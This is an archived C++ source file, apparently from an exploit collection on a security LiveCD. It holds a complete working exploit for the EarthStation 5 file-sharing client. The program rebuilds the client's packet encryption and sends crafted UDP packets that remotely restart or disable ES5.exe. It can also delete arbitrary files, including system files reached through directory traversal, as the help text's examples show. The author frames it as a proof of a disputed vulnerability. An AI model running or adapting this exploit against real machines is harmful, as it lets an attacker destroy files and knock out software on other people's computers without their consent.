home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / ES5.cpp < prev    next >
C/C++ Source or Header  |  2005-02-12  |  11KB  |  343 lines

  1. ********** BEGIN esv.cpp **********
  2. /*
  3.  * esv - "ExploitStation V" or "EarthStation Vulnerabilities"
  4.  * (C)2003 random nut (randnut@yahoo.com)
  5.  * All rights reserved.
  6.  *
  7.  * This code is released to the public because the people behind ES5
  8.  * would claim I lie. Thus, I have no choice but to let everyone
  9.  * download and run this application to prove that I'm right. Only try
  10.  * this on computers you're allowed to delete files on, and don't try
  11.  * this at home kids.
  12.  */
  13.  
  14. #include <WinSock2.h>
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <string.h>
  18.  
  19. typedef unsigned char   uint8;
  20. typedef unsigned short  uint16;
  21. typedef unsigned long   uint32;
  22. typedef signed char             int8;
  23. typedef short                   int16;
  24. typedef long                    int32;
  25.  
  26. uint32 __GetChecksum(const char* buf, int buflen = 0,
  27.                                          int uplim = 0x7FFFFFFF, int 
  28. lowlim = 0)
  29. {
  30.         if (buflen == 0)
  31.                 buflen = (int)strlen(buf);
  32.  
  33.         int chksum = 0;
  34.         for (int i = 0; i < buflen; i++, buf++)
  35.                 chksum ^= *buf << (8*(i&3));
  36.  
  37.         return (uint32)(lowlim + (chksum % (uplim - lowlim + 1)));
  38. }
  39.  
  40. uint32 GetChecksum(const char* lpszString)
  41. {
  42.         return __GetChecksum(lpszString) ^ 0x7FFFFFFF;
  43. }
  44.  
  45. void InitPacket(uint32* pkt, int size, uint32 packet)
  46. {
  47.         memset(pkt, 0, size);
  48.  
  49.         pkt[0x0000/4] = size;
  50.         pkt[0x0004/4] = 2180;
  51.         pkt[0x0008/4] = packet;
  52.         pkt[0x0058/4] = 0x3EFA;
  53. }
  54.  
  55. void InitPacket0C(uint32* pkt, uint32 sub_func,
  56.                                   const char* lpszString = "", uint32 
  57. CheckSum = 0)
  58. {
  59.         InitPacket(pkt, 0x288, 0x0C);
  60.         pkt[0x007C/4] = sub_func;
  61.         pkt[0x0080/4] = CheckSum;
  62.         strncpy((char*)&pkt[0x0088/4], lpszString, 0x200-1);
  63. }
  64.  
  65. // IMPORTANT:
  66. //      If ArraySize isn't a multiple of sizeof(uint32) then the last
  67. //      bytes starting from pArray[ArraySize] will be overwritten.
  68. static void EsvInitEncryptArray(char* pArray, int size, uint32 k)
  69. {
  70.         uint32 d = 0x78B7;
  71.         uint32* pBuf = (uint32*)pArray;
  72.         const uint32 c = 0x6AC690C5;
  73.         const uint32 cl = c & 0xFFFF;
  74.         const uint32 ch = c >> 0x10;
  75.  
  76.         for (int i = 0; i < size; i += 4, pBuf++)
  77.         {
  78.                 const uint32 old_d = d;
  79.                 d = d * c + k;
  80.                 k = (((old_d >> 0x10) * ch) + (((old_d >> 0x10) * cl) >> 
  81. 0x10))
  82.                         + (((old_d & 0xFFFF) * ch) >> 0x10);
  83.                 if (((old_d & 0xFFFF) * cl) >= (uint32)(-(int32)k))
  84.                         k++;
  85.                 *pBuf = d;
  86.         }
  87. }
  88.  
  89. static void EncryptBuffer(char* pBuf, int size, const char* pArray,
  90.                                                   int ArraySize)
  91. {
  92.         uint8* pWorkBuf = (uint8*)pBuf;
  93.  
  94.         for (int i = 0; i < size; i++, pWorkBuf++)
  95.                 *pWorkBuf ^= (uint8)(pArray[i % ArraySize] ^ i);
  96. }
  97.  
  98. static void EsvEncrypt(void* pBuf, int size)
  99. {
  100.         const ArraySize = 0x2F;
  101.         char Array[(ArraySize + sizeof(uint32) - 1) & 
  102. ~(sizeof(uint32)-1)];
  103.  
  104.         EsvInitEncryptArray(Array, ArraySize, size);
  105.         EncryptBuffer((char*)pBuf, size, Array, ArraySize);
  106. }
  107.  
  108. int SendPacket(uint32* pkt, uint32 IpAddr, uint16 IpPort,
  109.                            int MaxSendTries)
  110. {
  111.         uint32 dwSize = pkt[0x0000/4];
  112.         EsvEncrypt(pkt, dwSize);
  113.  
  114.         SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  115.         if (s == INVALID_SOCKET)
  116.         {
  117.                 printf("socket() failed\n");
  118.                 return 0;
  119.         }
  120.  
  121.         for (int i = 0; i < MaxSendTries; i++)
  122.         {
  123.                 sockaddr_in sa;
  124.                 memset(&sa, 0, sizeof(sa));
  125.                 sa.sin_family = AF_INET;
  126.                 sa.sin_port = htons(IpPort);
  127.                 sa.sin_addr.s_addr = htonl(IpAddr);
  128.  
  129.                 int size = sendto(s, (char*)pkt, dwSize, 0,
  130.                                                 (sockaddr*)&sa, 
  131. sizeof(sa));
  132.                 if (size == SOCKET_ERROR || size != dwSize)
  133.                 {
  134.                         printf("sendto() failed\n");
  135.                         return 0;
  136.                 }
  137.         }
  138.  
  139.         return 1;
  140. }
  141.  
  142. void help()
  143. {
  144.         printf(
  145. "/R <retries>            - Max UDP sendto() retries\n"
  146. "/r                      - Restart remote computer's ES5.exe\n"
  147. "/e                      - Tell remote computer's ES5.exe it's expired\n"
  148. "/d <filename>           - Delete file <filename>\n"
  149. "/s <shared dir>         - Remote computer's shared dir"
  150.                                                         "(case 
  151. sensitive.)\n"
  152. "                          Use quotes if path contains spaces.\n"
  153. "/i <IP>                 - Remote computer's IP\n"
  154. "/p <PORT>               - Remote computer's \"Search Service\" port\n"
  155. "\n"
  156. "The examples below assume remote ES5.exe is using IP=127.0.0.1"
  157.                 " and port=1234\n"
  158. "\n"
  159. "Example 1:\n"
  160. "    esv /r /i 127.0.0.1 /p 1234\n"
  161. "This will restart remote computer's ES5.exe.\n"
  162. "\n"
  163. "Example 2:\n"
  164. "    esv /e /i 127.0.0.1 /p 1234\n"
  165. "This will force remote computer's ES5.exe to stop functioning, "
  166.                                 "and let the\n"
  167. "user know about it.\n"
  168. "\n"
  169. "Example 3:\n"
  170. "    esv /d ..\\..\\..\\WINDOWS\\NOTEPAD.EXE /s "
  171.       "\"C:\\Program Files\\EarthStation5\\New Media Files\""
  172.       " /i 127.0.0.1 /p 1234\n"
  173. "This will delete the file \"\\WINDOWS\\NOTEPAD.EXE\". This will "
  174.                         "not work\n"
  175. "under Win98 (and probably Win95/WinME) but does work under "
  176.                         "WinXP (and\n"
  177. "probably WinNT, Win2000, Win2003)\n"
  178. "\n"
  179. "Example 4:\n"
  180. "    esv /d readme.txt /s \"C:\\Program Files\\EarthStation5\\"
  181.                    "New Media Files\" /i 127.0.0.1 /p 1234\n"
  182. "This will delete the file \"readme.txt\" in the folder\n"
  183. "\"C:\\Program Files\\EarthStation5\\New Media Files\".\n"
  184. "and works with all Windows versions\n"
  185. "\n"
  186. "IMPORTANT:\n"
  187. "The shared folder is case sensitive, and you must use the exact "
  188.                         "same path\n"
  189. "as ES5.exe does. If path = \"C:\\Program Files\\ES5\\Files\", "
  190.                         "then make sure\n"
  191. "that ES5.exe doesn't use the shorter path \"C:\\Progra~1\\ES5"
  192.                 "\\Files\"\n"
  193. "or has uppercased all letters. You can find out the exact path in\n"
  194. "ES5.exe's settings. Copy and paste that string.\n"
  195. );
  196.         exit(1);
  197. }
  198.  
  199. char* NewDirString(const char* s)
  200. {
  201.         char* szNew = (char*)malloc(strlen(s) + 1 + 1);
  202.         if (szNew == NULL)
  203.                 return szNew;
  204.  
  205.         strcpy(szNew, s);
  206.         strcat(szNew, "\\");
  207.         return szNew;
  208. }
  209.  
  210. int main(int argc, char** argv)
  211. {
  212.         int MaxSendTries = 50;          // Should be more than enough...
  213.         uint32 IpAddr = 0;                      // Remote comp's IP
  214.         uint16 IpPort = 0;                      // Remote comp's Search 
  215. Service port
  216.         int RestartOption = 0;          // /r option
  217.         int ExitOption = 0;                     // /e option
  218.         int DeleteOption = 0;           // /d option
  219.         const char* lpszSharedDir = NULL;
  220.         const char* lpszFilename = NULL;
  221.         uint32 pkt0C[0x0288/4];
  222.  
  223.         for (int i = 1; i < argc; i++)
  224.         {
  225.                 char* s = argv[i];
  226.                 if (*s != '/' && *s != '-')
  227.                         help();
  228.                 s++;
  229.                 if (!strcmp(s, "r"))
  230.                 {
  231.                         RestartOption = 1;
  232.                 }
  233.                 else if (!strcmp(s, "e"))
  234.                 {
  235.                         ExitOption = 1;
  236.                 }
  237.                 else if (!strcmp(s, "d"))
  238.                 {
  239.                         DeleteOption = 1;
  240.                         if (++i >= argc)
  241.                                 help();
  242.                         lpszFilename = argv[i];
  243.                 }
  244.                 else if (!strcmp(s, "s"))
  245.                 {
  246.                         if (++i >= argc)
  247.                                 help();
  248.                         lpszSharedDir = NewDirString(argv[i]);
  249.                         if (lpszSharedDir == NULL)
  250.                         {
  251.                                 printf("Out of memory\n");
  252.                                 return 1;
  253.                         }
  254.                 }
  255.                 else if (!strcmp(s, "i"))
  256.                 {
  257.                         if (++i >= argc)
  258.                                 help();
  259.                         IpAddr = inet_addr(argv[i]);
  260.                         if (IpAddr == INADDR_NONE)
  261.                                 help();
  262.                         IpAddr = ntohl(IpAddr);
  263.                 }
  264.                 else if (!strcmp(s, "p"))
  265.                 {
  266.                         if (++i >= argc)
  267.                                 help();
  268.                         uint32 p = strtoul(argv[i], NULL, 0);
  269.                         if (p == 0 || p > 0xFFFF)
  270.                                 help();
  271.                         IpPort = (uint16)p;
  272.                 }
  273.                 else if (!strcmp(s, "R"))
  274.                 {
  275.                         if (++i >= argc)
  276.                                 help();
  277.                         MaxSendTries = strtoul(argv[i], NULL, 0);
  278.                 }
  279.                 else
  280.                 {
  281.                         help();
  282.                 }
  283.         }
  284.  
  285.         if (IpAddr == 0 || IpPort == 0)
  286.                 help();
  287.  
  288.         WSAData wsa;
  289.         int ret;
  290.         if ((ret = WSAStartup(MAKEWORD(2,2), &wsa)) != 0)
  291.         {
  292.                 printf("Could not initialize WinSock. Error %08X\n", ret);
  293.                 return 1;
  294.         }
  295.         if (wsa.wVersion != 0x0202)
  296.         {
  297.                 printf("Couldn't init WinSock 2.2\n");
  298.                 return 1;
  299.         }
  300.  
  301.         int did_something = 0;
  302.         if (DeleteOption)
  303.         {
  304.                 if (lpszFilename == NULL || lpszSharedDir == NULL)
  305.                         help();
  306.  
  307.                 printf("Sending command to delete file \"%s\" in folder "
  308.                                 "\"%s\"...", lpszFilename, lpszSharedDir);
  309.                 InitPacket0C(pkt0C, 0x07, lpszFilename,
  310.                                         GetChecksum(lpszSharedDir));
  311.                 if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
  312.                         return 1;
  313.                 printf("Done!\n");
  314.                 did_something = 1;
  315.         }
  316.  
  317.         if (RestartOption)
  318.         {
  319.                 InitPacket0C(pkt0C, 0x2F);
  320.                 printf("Sending command to restart remote ES5.exe...");
  321.                 if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
  322.                         return 1;
  323.                 printf("Done!\n");
  324.                 did_something = 1;
  325.         }
  326.  
  327.         if (ExitOption)
  328.         {
  329.                 InitPacket0C(pkt0C, 0x09);
  330.                 printf("Sending command to close remote ES5.exe...");
  331.                 if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
  332.                         return 1;
  333.                 printf("Done!\n");
  334.                 did_something = 1;
  335.         }
  336.  
  337.         if (!did_something)
  338.                 help();
  339. }
  340. ********** END esv.cpp **********
  341.  
  342.  
  343.